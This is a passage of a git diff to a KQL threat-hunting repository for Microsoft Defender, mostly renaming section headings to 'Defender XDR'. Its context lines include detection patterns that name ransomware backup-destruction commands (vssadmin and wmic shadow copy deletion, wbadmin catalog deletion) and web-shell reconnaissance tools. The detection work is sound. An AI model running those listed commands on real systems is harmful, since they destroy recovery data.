a/Defender For Endpoint/RareConnectionsMadeByOffice.md b/Defender For Endpoint/RareConnectionsMadeByOffice.md index 4ed6ac3..4305570 100644 --- a/Defender For Endpoint/RareConnectionsMadeByOffice.md +++ b/Defender For Endpoint/RareConnectionsMadeByOffice.md 
@@ -1,6 +1,6 @@ # Hunt for the 20 most unusual connections made by Office. ---- -### Defender For Endpoint +### Defender XDR ``` let ConnectionsMadeByOfficeRegKey = @'\SOFTWARE\Microsoft\Office\16.0\Common\Internet\Server Cache'; diff --git a/Defender For Endpoint/RareISOFile.md b/Defender For Endpoint/RareISOFile.md index 85e4652..2700702 100644 --- a/Defender For Endpoint/RareISOFile.md +++ b/Defender For Endpoint/RareISOFile.md @@ -24,7 +24,7 @@ A actor can use a malicious mounted ISO to gain initial access. - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/automount - https://www.cisa.gov/uscert/ncas/alerts/aa20-266a -## Defender For Endpoint +## Defender XDR ``` let Threshold = 100; DeviceFileEvents @@ -50,4 +50,4 @@ applications that are less rare. SHA1, FileOriginUrl | sort by GlobalPrevalence, SHA1 -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/RareNetParamaterExecutions.md b/Defender For Endpoint/RareNetParamaterExecutions.md index d408ce2..4597cec 100644 --- a/Defender For Endpoint/RareNetParamaterExecutions.md +++ b/Defender For Endpoint/RareNetParamaterExecutions.md @@ -21,7 +21,7 @@ Adversaries might use parameters that are not often used in your environment. #### References - https://learn.microsoft.com/en-us/windows/win32/winsock/net-exe-2 -## Defender For Endpoint +## Defender XDR ```KQL let StartTime = 30d; let RareThresholdNetActionType = 10; // Determine how rare a command must be to be included in the results @@ -128,4 +128,4 @@ DeviceProcessEvents ProcessCommandLine has "view", "VIEW", "Else") | where NetActionType in (RareNetParameters) | project-reorder TimeGenerated, AccountUpn, ProcessCommandLine -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/Rare_Outgoing_IPv4_Connections.md b/Defender For Endpoint/Rare_Outgoing_IPv4_Connections.md index a780e82..642dbd4 100644 --- a/Defender For Endpoint/Rare_Outgoing_IPv4_Connections.md 
+++ b/Defender For Endpoint/Rare_Outgoing_IPv4_Connections.md @@ -26,7 +26,7 @@ These might of course include legit, rare outgoing connections but more importan - [Query walkthrough at Medium](https://ateixei.medium.com/f5bfdc0d55d6?source=friends_link&sk=7f5d56cf3a85c126992ce866dd864b86) -## Defender For Endpoint +## Defender XDR ```KQL // Author: Alex Teixeira (alex@opstune.com) // Query walkthrough: https://ateixei.medium.com/f5bfdc0d55d6?source=friends_link&sk=7f5d56cf3a85c126992ce866dd864b86 diff --git a/Defender For Endpoint/Regsvr32StartedByOfficeApplication.md b/Defender For Endpoint/Regsvr32StartedByOfficeApplication.md index 5c7462c..b38a3ca 100644 --- a/Defender For Endpoint/Regsvr32StartedByOfficeApplication.md +++ b/Defender For Endpoint/Regsvr32StartedByOfficeApplication.md @@ -15,7 +15,7 @@ Regsvr32 can be abused to proxy execution of malicious code. It can be spawned f - https://redcanary.com/threat-detection-report/threats/TA551/ - https://threatpost.com/cybercriminals-windows-utility-regsvr32-malware/178333/ -### Defender For Endpoint +### Defender XDR ``` let OfficeApplications = dynamic(['winword.exe', 'powerpnt.exe', 'excel.exe']); DeviceProcessEvents diff --git a/Defender For Endpoint/RemoteSMBConnection.md b/Defender For Endpoint/RemoteSMBConnection.md index 3875eab..e5f07f7 100644 --- a/Defender For Endpoint/RemoteSMBConnection.md +++ b/Defender For Endpoint/RemoteSMBConnection.md @@ -1,6 +1,6 @@ # Triggers when a remote SBM connection has been found ---- -### Defender For Endpoint +### Defender XDR ``` DeviceNetworkEvents diff --git a/Defender For Endpoint/RunasWithSavedCredentials.md b/Defender For Endpoint/RunasWithSavedCredentials.md index ec250fa..64cb037 100644 --- a/Defender For Endpoint/RunasWithSavedCredentials.md +++ b/Defender For Endpoint/RunasWithSavedCredentials.md 
@@ -18,7 +18,7 @@ A actor can use saved credentials to gain privilige escallation. - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc771525(v=ws.11) - https://superuser.com/questions/581548/runas-savecred-ask-for-password-if-another-user-runs-the-same-batch-file/903881#903881 -## Defender For Endpoint +## Defender XDR ``` DeviceProcessEvents | where FileName == "runas.exe" @@ -37,4 +37,4 @@ DeviceProcessEvents // Detect commandlines that contain savedcred this line can be removed to display all runas commands | where ProcessCommandLine contains "/savecred" | project TimeGenerated, DeviceName, TargetAccount, ProcessCommandLine -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/SMBSessionsByDevice.md b/Defender For Endpoint/SMBSessionsByDevice.md index c4d6ebf..7a5e05b 100644 --- a/Defender For Endpoint/SMBSessionsByDevice.md +++ b/Defender For Endpoint/SMBSessionsByDevice.md @@ -1,6 +1,6 @@ # Total SMB Sessions Created by a suspicious device -### Defender For Endpoint +### Defender XDR ``` let TimeFrame = 24h; //Customizable h = hours, d = days let SuspiciousDevices = dynamic(['server1.com', 'laptop1.com']); diff --git a/Defender For Endpoint/SMBSessionsByFileName.md b/Defender For Endpoint/SMBSessionsByFileName.md index 41ae84a..cbb1f01 100644 --- a/Defender For Endpoint/SMBSessionsByFileName.md +++ b/Defender For Endpoint/SMBSessionsByFileName.md @@ -1,6 +1,6 @@ # Total SMB Sessions Created by FileName -### Defender For Endpoint +### Defender XDR ``` let TimeFrame = 24h; //Customizable h = hours, d = days DeviceNetworkEvents diff --git a/Defender For Endpoint/SMBSessionsGeneratedByFile.md b/Defender For Endpoint/SMBSessionsGeneratedByFile.md index 41ae84a..cbb1f01 100644 --- a/Defender For Endpoint/SMBSessionsGeneratedByFile.md +++ b/Defender For Endpoint/SMBSessionsGeneratedByFile.md 
@@ -1,6 +1,6 @@ # Total SMB Sessions Created by FileName -### Defender For Endpoint +### Defender XDR ``` let TimeFrame = 24h; //Customizable h = hours, d = days DeviceNetworkEvents diff --git a/Defender For Endpoint/SecurityLogCleared.md b/Defender For Endpoint/SecurityLogCleared.md index 07b7d1d..af3f3ef 100644 --- a/Defender For Endpoint/SecurityLogCleared.md +++ b/Defender For Endpoint/SecurityLogCleared.md @@ -18,7 +18,7 @@ An actor removes the security log to hide malicious activities. - https://content.fireeye.com/apt-41/rpt-apt41 - https://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/ -## Defender For Endpoint +## Defender XDR ``` DeviceEvents | where ActionType == 'SecurityLogCleared' @@ -29,4 +29,4 @@ DeviceEvents DeviceEvents | where ActionType == 'SecurityLogCleared' | project Timestamp, DeviceName, ActionType -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/ShadowCopyDeletion.md b/Defender For Endpoint/ShadowCopyDeletion.md index 2beaff7..069e30e 100644 --- a/Defender For Endpoint/ShadowCopyDeletion.md +++ b/Defender For Endpoint/ShadowCopyDeletion.md @@ -18,7 +18,7 @@ An advasary removes the shadow copy before deploying ransomware to ensure that y - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/vssadmin-delete-shadows - https://redcanary.com/blog/its-all-fun-and-games-until-ransomware-deletes-the-shadow-copies -## Defender For Endpoint +## Defender XDR ``` let CommonRansomwareExecutionCommands = dynamic([@'vssadmin.exe delete shadows /all /quiet', @'wmic.exe shadowcopy delete', @'wbadmin delete catalog -quiet', diff --git a/Defender For Endpoint/SmartScreen/SmartScreenEvents.md b/Defender For Endpoint/SmartScreen/SmartScreenEvents.md index 638935d..e4821d6 100644 --- a/Defender For Endpoint/SmartScreen/SmartScreenEvents.md +++ b/Defender For Endpoint/SmartScreen/SmartScreenEvents.md 
@@ -1,6 +1,6 @@ # Hunt for SmartScreen events. What file was opened? Or which URL did they try to access? ---- -### Defender For Endpoint +### Defender XDR ```KQL DeviceEvents diff --git a/Defender For Endpoint/SmartScreen/SmartScreenOverride.md b/Defender For Endpoint/SmartScreen/SmartScreenOverride.md index f7c79f4..70a8df6 100644 --- a/Defender For Endpoint/SmartScreen/SmartScreenOverride.md +++ b/Defender For Endpoint/SmartScreen/SmartScreenOverride.md @@ -1,6 +1,6 @@ # Triggers when a user performs a SmartScreen Override action ---- -### Defender For Endpoint +### Defender XDR ```KQL DeviceEvents diff --git a/Defender For Endpoint/USB/ConnectedPnPTypes.md b/Defender For Endpoint/USB/ConnectedPnPTypes.md index a1c0ab0..024ceed 100644 --- a/Defender For Endpoint/USB/ConnectedPnPTypes.md +++ b/Defender For Endpoint/USB/ConnectedPnPTypes.md @@ -8,7 +8,7 @@ List the different Plug and Play (PnP) device types that are used in your organi #### References - https://learn.microsoft.com/en-us/powershell/module/pnpdevice/?view=windowsserver2022-ps -## Defender For Endpoint +## Defender XDR ```KQL DeviceEvents | where ActionType == "PnpDeviceConnected" @@ -27,4 +27,4 @@ DeviceEvents | extend PnPType = tostring(split(DeviceId, @"\", 0)[0]) | summarize Total = count() by PnPType | sort by Total -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/USB/USBConnectors.md b/Defender For Endpoint/USB/USBConnectors.md index bad40d1..caa09a6 100644 --- a/Defender For Endpoint/USB/USBConnectors.md +++ b/Defender For Endpoint/USB/USBConnectors.md @@ -14,7 +14,7 @@ You can filter on the description by adding: - https://learn.microsoft.com/en-us/powershell/module/pnpdevice/?view=windowsserver2022-ps - https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/advanced-hunting-updates-usb-events-machine-level-actions-and/ba-p/824152 -## Defender For Endpoint +## Defender XDR ```KQL DeviceEvents | where ActionType == "PnpDeviceConnected" 
@@ -37,4 +37,4 @@ DeviceEvents | project-reorder ClassName, PnPType, DeviceDescription, VendorIds, DeviceId | summarize TotalEvents = count() by DeviceDescription | sort by TotalEvents -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/Visualizations/Visualization - FileTypes.md b/Defender For Endpoint/Visualizations/Visualization - FileTypes.md index 56ef92a..e5d9e20 100644 --- a/Defender For Endpoint/Visualizations/Visualization - FileTypes.md +++ b/Defender For Endpoint/Visualizations/Visualization - FileTypes.md @@ -1,6 +1,6 @@ # Visualize FileTypes based on DeviceFileEvents -### Defender For Endpoint +### Defender XDR ``` let TimeFrame = 7d; diff --git a/Defender For Endpoint/Visualizations/Visualization - InspectedNetworkSignatures.md b/Defender For Endpoint/Visualizations/Visualization - InspectedNetworkSignatures.md index d14a327..386bcb1 100644 --- a/Defender For Endpoint/Visualizations/Visualization - InspectedNetworkSignatures.md +++ b/Defender For Endpoint/Visualizations/Visualization - InspectedNetworkSignatures.md @@ -1,7 +1,7 @@ # Display the Inspected Network Signatures -### Defender For Endpoint +### Defender XDR ``` DeviceNetworkEvents diff --git a/Defender For Endpoint/Visualizations/Visualization - LogonFailureReasons.md b/Defender For Endpoint/Visualizations/Visualization - LogonFailureReasons.md index 081b3a9..e1e2423 100644 --- a/Defender For Endpoint/Visualizations/Visualization - LogonFailureReasons.md +++ b/Defender For Endpoint/Visualizations/Visualization - LogonFailureReasons.md @@ -1,6 +1,6 @@ # Logon Failure Reasons -### Defender For Endpoint +### Defender XDR ``` DeviceLogonEvents diff --git a/Defender For Endpoint/Visualizations/Visualization - SysinternalToolUsage.md b/Defender For Endpoint/Visualizations/Visualization - SysinternalToolUsage.md index 21e5568..243ba14 100644 --- a/Defender For Endpoint/Visualizations/Visualization - SysinternalToolUsage.md 
+++ b/Defender For Endpoint/Visualizations/Visualization - SysinternalToolUsage.md 
@@ -1,6 +1,6 @@ # Visualize the Sysinternal tool usage of the last 30 days -### Defender For Endpoint +### Defender XDR ``` let SysInternalSuite = dynamic(["accesschk.exe","accesschk64.exe","AccessEnum.exe", "AdExplorer.exe","ADExplorer.exe","ADExplorer64.exe","ADInsight.chm","ADInsight.exe","ADInsight64.exe","adrestore.exe","adrestore64.exe","Autologon.exe","Autologon64.exe","autoruns.chm","Autoruns.exe","Autoruns64.exe","autorunsc.exe","autorunsc64.exe","Bginfo.exe","Bginfo64.exe","Cacheset.exe","Cacheset64.exe","Clockres.exe","Clockres64.exe","Contig.exe","Contig64.exe","Coreinfo.exe","Coreinfo64.exe","CPUSTRES.exe","CPUSTRES64.exe","ctrl2cap.amd.sys","ctrl2cap.exe","Dbgview.chm","Dbgview.exe","dbgview64.exe","Desktops.exe","Desktops64.exe","Disk2vhd.chm","disk2vhd.exe","disk2vhd64.exe","diskext.exe","diskext64.exe","Diskmon.exe","Diskmon64.exe","DiskView.exe","DiskView64.exe","du.exe","du64.exe","efsdump.exe","Eula.txt","FindLinks.exe","FindLinks64.exe","handle.exe","handle64.exe","hex2dec.exe","hex2dec64.exe","junction.exe","junction64.exe","ldmdump.exe","Listdlls.exe","Listdlls64.exe","livekd.exe","livekd64.exe","LoadOrd.exe","LoadOrd64.exe","LoadOrdC.exe","LoadOrdC64.exe","logonsessions.exe","logonsessions64.exe","movefile.exe","movefile64.exe","notmyfault.exe","notmyfault64.exe","notmyfaultc.exe","notmyfaultc64.exe","ntfsinfo.exe","ntfsinfo64.exe","pendmoves.exe","pendmoves64.exe","pipelist.exe","pipelist64.exe","portmon.exe","procdump.exe","procdump64.exe","procexp.chm","procexp.exe","procexp64.exe","procmon.chm","Procmon.exe","Procmon64.exe","PsExec.exe","PsExec64.exe","psfile.exe","psfile64.exe","PsGetsid.exe","PsGetsid64.exe","PsInfo.exe","PsInfo64.exe","pskill.exe","pskill64.exe","pslist.exe","pslist64.exe","PsLoggedon.exe","PsLoggedon64.exe","psloglist.exe","psloglist64.exe","pspasswd.exe","pspasswd64.exe","psping.exe","psping64.exe","PsService.exe","PsService64.exe","psshutdown.exe","psshutdown64.exe","pssuspend.exe","pssuspend64.exe","Pstools.chm","p
sversion.txt","RAMMap.exe","RAMMap64.exe","RDCMan.exe","readme.txt","RegDelNull.exe","RegDelNull64.exe","regjump.exe","ru.exe","ru64.exe","sdelete.exe","sdelete64.exe","ShareEnum.exe","ShareEnum64.exe","ShellRunas.exe","sigcheck.exe","sigcheck64.exe","streams.exe","streams64.exe","strings.exe","strings64.exe","sync.exe","sync64.exe","Sysmon.exe","Sysmon64.exe","tcpvcon.exe","tcpvcon64.exe","tcpview.chm","tcpview.exe","tcpview64.exe","Testlimit.exe","Testlimit64.exe","Vmmap.chm","vmmap.exe","vmmap64.exe","Volumeid.exe","Volumeid64.exe","whois.exe","whois64.exe","Winobj.exe","Winobj64.exe","ZoomIt.exe","ZoomIt64.exe"]); diff --git a/Defender For Endpoint/Visualizations/Visualization - UnauthorizedLogonsByAccount.md b/Defender For Endpoint/Visualizations/Visualization - UnauthorizedLogonsByAccount.md index 06efff1..cfc04a1 100644 --- a/Defender For Endpoint/Visualizations/Visualization - UnauthorizedLogonsByAccount.md +++ b/Defender For Endpoint/Visualizations/Visualization - UnauthorizedLogonsByAccount.md @@ -1,6 +1,6 @@ # Unauthorized Logon actions by Domain and Account -### Defender For Endpoint +### Defender XDR ``` DeviceLogonEvents diff --git a/Defender For Endpoint/Visualizations/Visualization- DefenderMachineGroups.md b/Defender For Endpoint/Visualizations/Visualization- DefenderMachineGroups.md index 678a19b..edab3c4 100644 --- a/Defender For Endpoint/Visualizations/Visualization- DefenderMachineGroups.md +++ b/Defender For Endpoint/Visualizations/Visualization- DefenderMachineGroups.md @@ -2,7 +2,7 @@ In order to get results the device groups need to be defined: [MS Documentation](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/machine-groups?view=o365-worldwide) -### Defender For Endpoint +### Defender XDR ``` DeviceInfo diff --git a/Defender For Endpoint/WMICAntivirusDiscovery.md b/Defender For Endpoint/WMICAntivirusDiscovery.md index d02454d..15ad786 100644 --- a/Defender For Endpoint/WMICAntivirusDiscovery.md 
+++ b/Defender For Endpoint/WMICAntivirusDiscovery.md @@ -24,7 +24,7 @@ An actor uses WMIC to list the installed antivirus solutions - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/jrat-new-anti-parsing-techniques - https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07195002/KL_AdwindPublicReport_2016.pdf -## Defender For Endpoint +## Defender XDR ``` DeviceProcessEvents // Filter only on WMIC executions diff --git a/Defender For Endpoint/WebshellDetection.md b/Defender For Endpoint/WebshellDetection.md index 06edfd8..859c30f 100644 --- a/Defender For Endpoint/WebshellDetection.md +++ b/Defender For Endpoint/WebshellDetection.md @@ -27,7 +27,7 @@ Look for suspicious process that IIS worker process (w3wp.exe), nginx, Apache HT Look for suspicious web shell execution, this can identify processes that are associated with remote execution and reconnaissance activity (example: “arp”, “certutil”, “cmd”, “echo”, “ipconfig”, “gpresult”, “hostname”, “net”, “netstat”, “nltest”, “nslookup”, “ping”, “powershell”, “psexec”, “qwinsta”, “route”, “systeminfo”, “tasklist”, “wget”, “whoami”, “wmic”, etc.) -## Defender For Endpoint +## Defender XDR ```KQL let webservers = dynamic(["beasvc.exe", "coldfusion.exe", "httpd.exe", "owstimer.exe", "visualsvnserver.exe", "w3wp.exe", "tomcat", "apache2", "nginx"]); let linuxShells = dynamic(["/bin/bash", "/bin/sh", "python", "python3"]); diff --git a/Defender For Endpoint/WevtutilClearLogs.md b/Defender For Endpoint/WevtutilClearLogs.md index 6c3f8f9..071b28c 100644 --- a/Defender For Endpoint/WevtutilClearLogs.md +++ b/Defender For Endpoint/WevtutilClearLogs.md 
@@ -19,7 +19,7 @@ Multiple Threat Actors levarage this technique to hide from defenders #### References - https://www.cisa.gov/sites/default/files/publications/aa22-321a_joint_csa_stopransomware_hive.pdf -## Defender For Endpoint +## Defender XDR ```KQL DeviceProcessEvents | extend ProcessCommandLineToLower = tolower(ProcessCommandLine) @@ -32,4 +32,4 @@ DeviceProcessEvents | extend ProcessCommandLineToLower = tolower(ProcessCommandLine) | where ProcessCommandLineToLower has "wevtutil.exe" and ProcessCommandLineToLower has_any ("cl", "clear-log") | project-reorder TimeGenerated, DeviceName, AccountSid, ProcessCommandLine, InitiatingProcessCommandLine -``` \ No newline at end of file +``` diff --git a/Defender For Endpoint/WindowsNetworkSniffing.md b/Defender For Endpoint/WindowsNetworkSniffing.md index beb5c37..5e6b891 100644 --- a/Defender For Endpoint/WindowsNetworkSniffing.md +++ b/Defender For Endpoint/WindowsNetworkSniffing.md @@ -17,7 +17,7 @@ Actor can use network sniffing to capture information. If data (passwords) is se #### References - https://learn.microsoft.com/en-us/windows-server/networking/technologies/pktmon/pktmon -## Defender For Endpoint +## Defender XDR ``` DeviceProcessEvents diff --git a/Defender For Endpoint/nf_ttp_t1543_peach-sandstorm_azure_arc_persistence.md b/Defender For Endpoint/nf_ttp_t1543_peach-sandstorm_azure_arc_persistence.md index 53cfea8..75aef18 100644 --- a/Defender For Endpoint/nf_ttp_t1543_peach-sandstorm_azure_arc_persistence.md +++ b/Defender For Endpoint/nf_ttp_t1543_peach-sandstorm_azure_arc_persistence.md 
@@ -25,7 +25,7 @@ The risk addressed by this detection rule is the unauthorized installation of Az - [Azure ARC Agent Overview](https://learn.microsoft.com/en-us/azure/azure-arc/servers/agent-overview) - [Microsoft Security Blog on Azure ARC](https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/) -## Defender For Endpoint +## Defender XDR ```KQL // Unexpected installation of azure arc agent - service installation let ServiceNames = datatable(name:string)["himds.exe","gc_arc_service.exe","gc_extension_service.exe"]; diff --git a/Defender For Endpoint/ttp_t1027-010_powershellEncodedCommand.md b/Defender For Endpoint/ttp_t1027-010_powershellEncodedCommand.md index db3eabb..f38a420 100644 --- a/Defender For Endpoint/ttp_t1027-010_powershellEncodedCommand.md +++ b/Defender For Endpoint/ttp_t1027-010_powershellEncodedCommand.md @@ -26,7 +26,7 @@ FIN7, ZLoader, and FakeBat have been observed performing this behaviour in recen #### References - [https://kqlquery.com/](https://redcanary.com/blog/msix-installers/) -## Defender For Endpoint +## Defender XDR ```KQL //this will be noisy and no good for a SIEM analytic DeviceProcessEvents diff --git a/Defender For Endpoint/ttp_t1059-001_powershell_windowsappsdir_fin7.md b/Defender For Endpoint/ttp_t1059-001_powershell_windowsappsdir_fin7.md index f847e69..ec04aba 100644 --- a/Defender For Endpoint/ttp_t1059-001_powershell_windowsappsdir_fin7.md +++ b/Defender For Endpoint/ttp_t1059-001_powershell_windowsappsdir_fin7.md @@ -26,7 +26,7 @@ FIN7 have been observed performing this behaviour in recent intrusions. FIN7 act #### References - [https://kqlquery.com/](https://redcanary.com/blog/msix-installers/) -## Defender For Endpoint +## Defender XDR ```KQL DeviceProcessEvents | where InitiatingProcessFolderPath contains "windowsapps" and FileName =~ "powershell.exe" and ProcessCommandLine has_all ("windowsapps","-file",".ps1") 
diff --git a/Defender For Endpoint/ttp_t1127-001_suspNetworkConnMSBuild.md b/Defender For Endpoint/ttp_t1127-001_suspNetworkConnMSBuild.md index f50fdb4..aa6baa5 100644 --- a/Defender For Endpoint/ttp_t1127-001_suspNetworkConnMSBuild.md +++ b/Defender For Endpoint/ttp_t1127-001_suspNetworkConnMSBuild.md @@ -26,7 +26,7 @@ FIN7, ZLoader, and FakeBat have been observed performing this behaviour in recen #### References - [MSIX installer malware delivery on the rise across multiple campaigns](https://redcanary.com/blog/msix-installers/) -## Defender For Endpoint +## Defender XDR ```KQL // Detection opportunity 5: MSBuild without commands DeviceNetworkEvents diff --git a/Defender For Endpoint/ttp_t1219_netsupportrat_fin7.md b/Defender For Endpoint/ttp_t1219_netsupportrat_fin7.md index 17a2ac3..baabc5b 100644 --- a/Defender For Endpoint/ttp_t1219_netsupportrat_fin7.md +++ b/Defender For Endpoint/ttp_t1219_netsupportrat_fin7.md @@ -26,7 +26,7 @@ FIN7 have been observed performing this behaviour in recent intrusions. FIN7 act #### References - [https://kqlquery.com/](https://redcanary.com/blog/msix-installers/) -## Defender For Endpoint +## Defender XDR ```KQL // Detection opportunity 2: NetSupport running from unexpected directory DeviceProcessEvents diff --git a/Defender For Endpoint/ttp_t1562-001_disabledefender.md b/Defender For Endpoint/ttp_t1562-001_disabledefender.md index ac93af1..b1efae2 100644 --- a/Defender For Endpoint/ttp_t1562-001_disabledefender.md +++ b/Defender For Endpoint/ttp_t1562-001_disabledefender.md @@ -26,7 +26,7 @@ FIN7, ZLoader, and FakeBat have been observed performing this behaviour in recen #### References - [https://kqlquery.com/](https://redcanary.com/blog/msix-installers/) -## Defender For Endpoint +## Defender XDR ```KQL //Detection opportunity 3: Abusing PowerShell to disable Defender components DeviceProcessEvents 
diff --git a/Defender For Identity/AccountWithPasswordNeverExpiresEnabled.md b/Defender For Identity/AccountWithPasswordNeverExpiresEnabled.md index 9b4db0b..ce94625 100644 --- a/Defender For Identity/AccountWithPasswordNeverExpiresEnabled.md +++ b/Defender For Identity/AccountWithPasswordNeverExpiresEnabled.md @@ -8,7 +8,7 @@ In Windows a password can be set so that it will never expire. This is normaly n #### Risk A account that has as password that never exprided on and it has a weak password. That makes it vulnerable for Brute Force attacks. -## Defender For Endpoint +## Defender XDR ``` IdentityDirectoryEvents | where ActionType == "Account Password Never Expires changed" diff --git a/Defender For Identity/AnomalousGroupPolicyDiscovery.md b/Defender For Identity/AnomalousGroupPolicyDiscovery.md index 5077398..c57ee23 100644 --- a/Defender For Identity/AnomalousGroupPolicyDiscovery.md +++ b/Defender For Identity/AnomalousGroupPolicyDiscovery.md @@ -16,7 +16,7 @@ Potential false positive is a new Administrator that has not performed group pol #### Risk An attacker queries Group Policy object to gain valuable information about the environment. -## Defender For Endpoint +## Defender XDR ```KQL let PreviousActivity = materialize ( IdentityQueryEvents diff --git a/Defender For Identity/AnomalousLDAPTraffic.md b/Defender For Identity/AnomalousLDAPTraffic.md index 7a95f53..7b2e5fc 100644 --- a/Defender For Identity/AnomalousLDAPTraffic.md +++ b/Defender For Identity/AnomalousLDAPTraffic.md @@ -27,7 +27,7 @@ An adversary has gained access to your network and performes LDAP queries to per #### References - https://www.microsoft.com/en-us/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/ -## Defender For Endpoint +## Defender XDR ```KQL // Variables to define the anomalous behaviour let starttime = 30d; 
@@ -94,4 +94,4 @@ TimeSeriesAlerts // Baseline is the most important result, that is the avarage amount of LDAP queries executed by a device, the PerHourCount shows the deviation from this amount. | project DeviceName, Timestamp, PerHourCount, baseline, anomalies, score | where PerHourCount > TotalEventsThreshold -``` \ No newline at end of file +``` diff --git a/Defender For Identity/NewLateralMovementPathToSensitiveAccountIdentified.md b/Defender For Identity/NewLateralMovementPathToSensitiveAccountIdentified.md index dfea823..10afa38 100644 --- a/Defender For Identity/NewLateralMovementPathToSensitiveAccountIdentified.md +++ b/Defender For Identity/NewLateralMovementPathToSensitiveAccountIdentified.md @@ -8,7 +8,7 @@ Defender For Identity identifies lateral movement paths to all sensitive account #### References - https://learn.microsoft.com/en-us/defender-for-identity/understand-lateral-movement-paths -## Defender For Endpoint +## Defender XDR ``` IdentityDirectoryEvents diff --git a/Defender For Identity/PasswordChangeAfterSuccesfulBruteForce.md b/Defender For Identity/PasswordChangeAfterSuccesfulBruteForce.md index 8023589..67e226e 100644 --- a/Defender For Identity/PasswordChangeAfterSuccesfulBruteForce.md +++ b/Defender For Identity/PasswordChangeAfterSuccesfulBruteForce.md @@ -24,7 +24,7 @@ An adversary has successfully performed a brute force on an account and changes #### References - https://attack.mitre.org/datasources/DS0002/#User%20Account%20Modification -## Defender For Endpoint +## Defender XDR ``` let FailedLogonsThreshold = 20; let SuccessfulLogonsThreshold = 1; @@ -85,4 +85,4 @@ IdentityLogonEvents // Remove all entries where the password change took place before the brute force | where TimeDifference > 0 | where TimeDifference <= SearchWindow -``` \ No newline at end of file +``` 
diff --git a/Defender For Identity/PotentialKerberosEncryptionDowngrade.md b/Defender For Identity/PotentialKerberosEncryptionDowngrade.md index 41cb392..65a5e8c 100644 --- a/Defender For Identity/PotentialKerberosEncryptionDowngrade.md +++ b/Defender For Identity/PotentialKerberosEncryptionDowngrade.md @@ -26,7 +26,7 @@ An adversary has performed an downgrade attack to be able to perform kerberoasti #### References - https://learn.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-configure-encryption-types-allowed-for-kerberos -## Defender For Endpoint +## Defender XDR ``` IdentityDirectoryEvents | where ActionType == "Account Supported Encryption Types changed" @@ -51,4 +51,4 @@ IdentityDirectoryEvents // Exclude the devices that did already have a supported encryption enabled. This is mostly due to the deployment of a device. | where FromAccountSupportedEncryptionTypes != "N/A" | project TimeGenerated, DeviceName, FromAccountSupportedEncryptionTypes, ToAccountSupportedEncryptionTypes, ActorDevice, TargetDevice -``` \ No newline at end of file +``` diff --git a/Defender For Identity/SMBFileCopy.md b/Defender For Identity/SMBFileCopy.md index 560ca84..c183616 100644 --- a/Defender For Identity/SMBFileCopy.md +++ b/Defender For Identity/SMBFileCopy.md @@ -16,7 +16,7 @@ A false positive would be a aministrator that would perform legitimate SMB file #### Risk A actor uses a SMB file copy to distrubute malware in your environment. -## Defender For Endpoint +## Defender XDR ``` let WhitelistedAccounts = dynamic(['account1', 'account2']); diff --git a/Defender For Identity/UserAddedToSensitiveGroup.md b/Defender For Identity/UserAddedToSensitiveGroup.md index b23175c..dd2e792 100644 --- a/Defender For Identity/UserAddedToSensitiveGroup.md +++ b/Defender For Identity/UserAddedToSensitiveGroup.md 
@@ -19,7 +19,7 @@ A attacker has added themself to a sensitive group and can perform priviliges ac #### References - https://learn.microsoft.com/en-us/defender-for-identity/entity-tags#sensitive-entities -### Defender For Endpoint +### Defender XDR ```KQL let SensitiveGroups = dynamic(['Domain Admins', 'Enterprise Admins', 'Exchange Admins']); // Add your sensitive groups to this list IdentityDirectoryEvents diff --git a/Defender For Identity/Visualization - ClearTextLDAPSignIns.md b/Defender For Identity/Visualization - ClearTextLDAPSignIns.md index 35472b1..e5147c8 100644 --- a/Defender For Identity/Visualization - ClearTextLDAPSignIns.md +++ b/Defender For Identity/Visualization - ClearTextLDAPSignIns.md @@ -5,7 +5,7 @@ #### Description This query visualises the top 100 Devices that initiate the most clear text LDAP authentications. You preferably want to use an encrypted form of LDAP instead of cleartext. -## Defender For Endpoint +## Defender XDR ``` IdentityLogonEvents diff --git a/Defender For Identity/Visualization - MostInteractiveSignInsByUser.md b/Defender For Identity/Visualization - MostInteractiveSignInsByUser.md index a045326..eefe37f 100644 --- a/Defender For Identity/Visualization - MostInteractiveSignInsByUser.md +++ b/Defender For Identity/Visualization - MostInteractiveSignInsByUser.md @@ -5,7 +5,7 @@ #### Description Visualize the top 100 users that have performed the most interactive sign ins. -### Defender For Endpoint +### Defender XDR ``` IdentityLogonEvents diff --git a/Defender XDR/AlertSupressionAdded.md b/Defender XDR/AlertSupressionAdded.md index 513db58..949c753 100644 --- a/Defender XDR/AlertSupressionAdded.md +++ b/Defender XDR/AlertSupressionAdded.md 
@@ -9,7 +9,7 @@ This query lists all the supressions that have been added to Defender XDR. This - https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/introducing-the-new-alert-suppression-experience/ba-p/3562719 - https://kqlquery.com/posts/audit-defender-xdr/ -## Defender For Endpoint +## Defender XDR ``` CloudAppEvents | where Timestamp > ago(30d) @@ -26,4 +26,4 @@ CloudAppEvents | extend Workload = tostring(parse_json(RawEventData).Workload), ResultStatus = tostring(parse_json(RawEventData).ResultStatus), ResultDescription = tostring(parse_json(RawEventData).ResultDescription) | project-rename InitiatedByAccountName = AccountDisplayName, InitiatedByAccounttId = AccountId | project-reorder TimeGenerated, Workload, ResultDescription, ResultStatus, InitiatedByAccountName, InitiatedByAccounttId -``` \ No newline at end of file +``` diff --git a/Defender XDR/CustomDetectionDeletion.md b/Defender XDR/CustomDetectionDeletion.md index 13fa451..5967d68 100644 --- a/Defender XDR/CustomDetectionDeletion.md +++ b/Defender 